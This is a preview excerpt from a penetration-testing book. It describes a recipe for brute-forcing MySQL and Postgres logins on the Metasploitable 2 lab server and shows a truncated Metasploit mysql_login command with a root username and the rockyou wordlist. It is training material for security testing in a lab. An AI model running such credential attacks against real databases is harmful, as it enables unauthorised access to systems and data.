April 2017
Intermediate to advanced
512 pages
7h 59m
English
In this recipe, we will see how to gain access to the MySQL and Postgres databases. We will be using the Metasploitable 2 vulnerable server to perform the attacks.
For this exercise, we will be using Metasploit as our module to perform the credential attack, since we have already seen how the other tools work in the previous recipes. Let's start the Metasploit console and start exploiting the SQL servers.
use auxiliary/scanner/mysql/mysql_login set username root set stop_on_success true set rhosts <Target IP address> set pass_file /usr/share/wordlists/rockyou.txt ...
Read now
Unlock full access